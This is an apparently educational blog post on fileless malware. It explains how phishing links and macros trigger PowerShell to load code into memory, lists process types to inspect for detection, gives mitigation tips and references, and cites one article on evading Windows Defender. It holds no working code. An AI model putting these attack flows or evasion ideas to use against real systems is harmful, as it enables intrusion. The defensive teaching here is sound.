FILELESS MALWARE ATTACKS : INTRO

FILELESS MALWARE ATTACKS

Unlike attacks carried out using traditional malware, fileless malware attacks don’t entail attackers installing software on a victim’s machine. This means that there’s NO signature for antivirus software to detect, greatly decreasing the effectiveness of these programs in detecting fileless malware attacks. And these attacks are almost 10 times more likely to succeed in infecting a machine than file-based attacks.

WeeklyPlayfulBear-size_restricted.gif

Threat actors

PS: Educational purposes 🙏 NOT endorsement

How Fileless Malware works

This slideshow requires JavaScript.

Source: Emsisoft

TRUE FILELESS MALWARE IS NON-PERSISTENT — ALL TRACES OF IT DISAPPEAR WHEN THE SYSTEM IS REBOOTED, MAKING FORENSIC INVESTIGATION DIFFICULT.

The notion of fileless malware has been gaining a lot of attention in the industry.

Untitled.png

The majority of successful attacks are now fileless. Source: The Ponemon Institute

Explore search interest for fileless malware, Malware by time, location and popularity on Google Trends.

Fileless malwaer.jpg

In-Depth Approach

Unlike file-based attacks, fileless malware attacks DO NOT download malicious files or write content to disk. Attackers exploit application vulnerabilities to inject code directly into the memory space of an existing application. They can also leverage trusted office applications or administration tools native to Windows OS, such as PowerShell or Windows Management Instrumentation (WMI), to run scripts and load malicious code directly into memory. Like all attacks, the goal is to gain control of computers to achieve the attacker’s goal, such as destruction, distortion (ransomware), data/credential theft, or additional attacks.

Bitefender approach.jpg

Source: Bitdefender

As in the example illustrated above, a phishing email containing a link takes the user to an exploit-hosting site. The browser exploits triggers PowerShell running command line (script), then PowerShell follows the instructions to download additional script (typically a larger command line) from a remote site. The larger command line contains fileless malware that is assembled and runs directly in memory.

In a second example, a user may receive a phishing email with a .doc attachment containing a macro. If the user enables the macro, essentially a VBA script, it triggers the PowerShell script that downloads additional scripts containing fileless malware code from a remote location. It then injects that malicious code into the memory space of a vulnerable application.

Must read: how hacker hacked into the financial domain: https://d3pakblog.wordpress.com/2017/03/09/hacker-hacked-into-financial-domain/

69% of organizations don’t believe their antivirus can stop the threats they’re seeing.

Investigation Approach

rrer.png

Cyber Kill Chain: The seven steps of the Cyber Kill Chain enhance visibility into an attack and enrich an analyst’s understanding of an adversary’s tactics, techniques, and procedures.

THE-CYBER-KILL-CHAIN-body.png.pc-adaptive.1920.medium.png

Can Fileless Malware Be Stopped?

The risk of ransomware penetration and the business impact of a ransomware infection can both be reduced by implementing several conventional best practices. These can be split into two categories, general good practice and security best practice; these baseline protections are strongly recommended to any organization.

The problem is complex. To begin with, organizations have to realize that processes that run scripts, like Microsoft PowerShell, are just as capable of delivering malware as processes that execute them, like opening a PDF. Secondly, companies must make sure that their employees are educated about the dangers of opening ANY attachments that aren’t from known senders, and third, every patch issued by any vendor must be installed immediately. This includes, of course, the antivirus software on the system, as well as the operating system itself. Simple steps like these can prevent a lot of future pain. As per McAfee, Fileless threats continued to be a growing concern in Q3, with PowerShell malware growing by 119%.

With respect to emerging threat like ransomware so best practices from prime levels are Education awareness, Data Backup, Patching & update.

Challenges

Fileless malware already presents a significant problem, and it’s gaining further popularity among attackers because it is virtually undetectable by traditional file-based prevention and detection techniques. Endpoint security tools, including so-called next-gen AV, don’t scrutinize scripts or command line, such as PowerShell scripts, and no file is written on the disk. Since traditional AV and so-called next-gen AV focus on static file analysis, fileless attacks can evade these AV tools without triggering alarms because no file is downloaded and saved to the disk.

Blocking File-Less Attacks

  1. Machine Learning & Algorithm:  Suspicious traffic and file download
  2. Process Inspection: Need to review policies for specific arguments (PowerShell, mshta, wscript, cscript, rundll, autoit, regedit, office macro, browser spawn PowerShell or any process inject code in other processes memory space)
  3. Retrospective detection: Collect as much IoCs/IoA (Indicator of compromise/attacks) respect to threat campaign
  4. Studying the adversaries: Use intelligence baseline and seek out known tactics, techniques and procedures (TTPs) used by multiple adversarial groups

Read case study: Hacker who hacked hacking team

 https://d3pakblog.wordpress.com/2017/01/07/the-vigilante-who-hacked-hacking-team/ 

The SANS Security Maturity Model

The SANS Institute has developed a Maturity Model for Endpoint Security that clearly lays out a progression of defensive capabilities relating to end-user devices, which continue to be the source of approximately 70% of successful malware breaches.

SANS Maturity Model for Endpoint Security.jpg

Source: https://www.bromium.com/wp-content/uploads/2018/03/Bromium-Securing-the-Modern-Endpoint-White-Paper_2018.pdf

 Some tips to avoid fileless malware infections, from TechRepublic’s:

  1. Restrict unnecessary scripting languages
  2. Disable macros and digitally sign trusted macros
  3. Monitor security appliance logs for unauthorized traffic
  4. Implement endpoint security with active monitoring
  5. Perform patch management across all devices

By going through above security measures, it will reduce the chances of being a trap.

the-rise-of-file-less-attacks-3.png

Some References

  • Fileless Malware Tips

https://www.apriorit.com/dev-blog/517-fileless-malware-protection-tips

  • Hiding Metasploit Shellcode to Evade Windows Defender

https://blog.rapid7.com/2018/05/03/hiding-metasploit-shellcode-to-evade-windows-defender/

  • Decoding Fileless Malware:

http://resources.infosecinstitute.com/decoding-fileless-malware/#gref

  • Fileless malware- the ninja technique to spread malware using default OS tools

http://blog.securelayer7.net/fileless-malware-ninja-technique-spread-malwares-using-default-os-tools/

  • Fileless Malware: Attack Trend Exposed

http://blog.morphisec.com/fileless-malware-attack-trend-exposed

  • FILELESS MALWARE 101: UNDERSTANDING NON-MALWARE ATTACKS

https://www.cybereason.com/blog/fileless-malware

  • Fileless Malware: A Hidden Threat

https://blog.trendmicro.com/fileless-malware-a-hidden-threat/

  • Detecting Malicious PowerShell Commands using Deep Neural Networks

https://arxiv.org/pdf/1804.04177.pdf

  • Extract Shellcode from Fileless Malware like a Pro

https://www.youtube.com/watch?v=jbieGfML0Bs

  • Must read: AGE OF THE CYBER HUNTER: HOW A NEW GENERATION OF THREATS CHANGED THE CYBERSECURITY PARADIGM

https://www.rackspace.com/sites/default/files/white-papers/age-of-the-cyber-hunter-white-paper_1.pdf

Some Courses

  • Malware Analysis

https://www.cybrary.it/course/malware-analysis/

  • A curated list of awesome malware analysis tools and resources

https://github.com/rshipp/awesome-malware-analysis

NEW TREND

Cryptominers have impacted 55% of organizations globally.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.